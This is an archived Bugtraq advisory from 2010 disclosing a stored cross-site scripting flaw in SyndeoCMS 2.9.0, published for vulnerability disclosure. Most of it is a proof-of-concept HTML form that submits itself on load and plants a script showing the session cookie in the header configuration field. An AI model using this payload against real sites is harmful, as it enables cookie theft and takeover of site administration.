lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-Id: <201007262007.o6QK7tbj091473@htbridge.ch>
Date: Mon, 26 Jul 2010 22:07:55 +0200 (CEST)
From: advisory@...ridge.ch
To: bugtraq@...urityfocus.com
Subject: XSS vulnerability in SyndeoCMS

Vulnerability ID: HTB22491
Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_syndeocms.html
Product: SyndeoCMS
Vendor: The SyndeoCMS team ( http://www.syndeocms.org/ ) 
Vulnerable Version: 2.9.0 and Probably Prior Versions
Vendor Notification: 12 July 2010 
Vulnerability Type: Stored XSS (Cross Site Scripting)
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: Medium 
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/) 

Vulnerability Details:
User can execute arbitrary JavaScript code within the vulnerable application.

The vulnerability exists due to failure in the saveconfig script to properly sanitize user-supplied input in "header" variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.

An attacker can use browser to exploit this vulnerability. The following PoC is available:

<form action="http://host/starnet/index.php?option=modulemanager&module=3&modoption=saveconfig" method="post" name="main" >

<input type="hidden" name="general[0]" value="1" />
<input type="hidden" name="general[1]" value="#99FFFF" />
<input type="hidden" name="general[2]" value="900" />
<input type="hidden" name="general[3]" value="1" />
<input type="hidden" name="general[4]" value="#000066" />
<input type="hidden" name="header[1]" value="header4.php" />
<input type="hidden" name="header[2]" value="290" />
<input type="hidden" name="header[3]" value='starnet/media/header-bg.jpg"><script>alert(document.cookie)</script>' />
<input type="hidden" name="header[4]" value="Century Schoolbook" />
<input type="hidden" name="header[5]" value="55" />
<input type="hidden" name="header[6]" value="#FFFFFF" />
<input type="hidden" name="header[7]" value="0" />
<input type="hidden" name="header[0]" value="1" />
<input type="hidden" name="section[1]" value="section1.php" />
<input type="hidden" name="section[2]" value="#FF0000" />
<input type="hidden" name="section[3]" value="#99CC99" />
<input type="hidden" name="section[4]" value="#0099CC" />
<input type="hidden" name="section[5]" value="Arial" />
<input type="hidden" name="section[6]" value="14" />
<input type="hidden" name="section[7]" value="#FFFFFF" />
<input type="hidden" name="section[8]" value="100" />
<input type="hidden" name="section[9]" value="#0099CC" />
<input type="hidden" name="section[0]" value="1" />
<input type="hidden" name="status[1]" value="status3.php" />
<input type="hidden" name="status[2]" value="#FF33FF" />
<input type="hidden" name="status[3]" value="Arial" />
<input type="hidden" name="status[4]" value="10" />
<input type="hidden" name="status[5]" value="#CCFFCC" />
<input type="hidden" name="status[6]" value="Location:" />
<input type="hidden" name="status[7]" value="" />
<input type="hidden" name="status[8]" value="" />
<input type="hidden" name="status[9]" value="" />
<input type="hidden" name="status[0]" value="1" />
<input type="hidden" name="menu[1]" value="menu1.php" />
<input type="hidden" name="menu[2]" value="#CC66FF" />
<input type="hidden" name="menu[3]" value="#FF9966" />
<input type="hidden" name="menu[4]" value="#FF66FF" />
<input type="hidden" name="menu[5]" value="#CCCC99" />
<input type="hidden" name="menu[6]" value="Arial" />
<input type="hidden" name="menu[7]" value="14" />
<input type="hidden" name="menu[8]" value="#000000" />
<input type="hidden" name="menu[9]" value="starnet/themes/editable/arrow_blue.gif" />
<input type="hidden" name="menu[0]" value="1" />
<input type="hidden" name="content[0]" value="content1.php" />
<input type="hidden" name="content[1]" value="#FFFFFF" />
<input type="hidden" name="content[2]" value="#FFFF99" />
<input type="hidden" name="content[3]" value="630" />
<input type="hidden" name="content[4]" value="500" />
<input type="hidden" name="content[5]" value="Arial" />
<input type="hidden" name="content[6]" value="10" />
<input type="hidden" name="content[7]" value="#000000" />
<input type="hidden" name="content[8]" value="1" />
<input type="hidden" name="footer[1]" value="footer2.php" />
<input type="hidden" name="footer[2]" value="#003366" />
<input type="hidden" name="footer[3]" value="Arial" />
<input type="hidden" name="footer[4]" value="10" />
<input type="hidden" name="footer[5]" value="#FFFFFF" />
<input type="hidden" name="footer[6]" value="Page last changed:" />
<input type="hidden" name="footer[7]" value="25" />
<input type="hidden" name="footer[0]" value="1" />
<input type="hidden" name="savebutton" value="   Save" />


</form>
<script>
document.main.submit();
</script>



Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ